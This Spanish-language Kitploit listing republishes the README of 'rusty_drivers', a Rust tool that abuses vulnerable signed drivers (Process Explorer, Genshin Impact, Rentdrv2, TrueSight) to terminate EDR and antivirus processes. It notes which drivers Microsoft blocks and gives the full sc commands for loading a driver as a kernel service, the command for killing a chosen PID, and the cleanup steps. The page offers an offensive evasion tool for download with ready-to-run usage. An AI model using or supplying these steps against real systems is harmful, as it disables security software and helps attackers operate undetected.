Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
rusty_drivers — BYOVD collection | Kitploit
Herramientas/GitHubGitHub/florianib/rusty_drivers
ExploitationIDS/IPS EvasionPost-ExploitationRed TeamingAdversarial Attack
GitHubflorianib/rusty_drivers

rusty_drivers

BYOVD collection

Ver Repositorio
246hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RustyDrivers

Este proyecto es una colección BYOVD centrada en eliminar procesos de EDR / AV.

Actualmente se admiten los siguientes controladores:

DriverArgument NameBlocked
Process Explorerprocess_explorerYes
Genshin ImpactgenshinYes
Rentdrv2rentdrv2No
TrueSighttruesightNo

"Blocked" significa que el controlador está en la lista de bloqueo de Microsoft y no puede ejecutarse en un Windows actualizado.

Build

root@kitploit:~
cargo build --release

Usage

root@kitploit:~
rusty_drivers.exe --help            
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>

Options:
  -p, --pid <PID>
  -d, --driver <DRIVER>
  -h, --help             Print help
  -V, --version          Print version

Example

Dado que el ejecutable no registra un servicio para explotar el controlador, esto debe hacerse manualmente:

root@kitploit:~
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto

Después, el servicio puede iniciarse:

root@kitploit:~
sc start Test123

Finalmente, para finalizar el proceso con el PID 1234 usando el controlador de Process Explorer, se puede usar el siguiente comando:

root@kitploit:~
rusty_drivers.exe --pid 1234 --driver process_explorer          

No olvides limpiar el servicio después:

root@kitploit:~
sc stop Test123
sc delete Test123
Descargar herramienta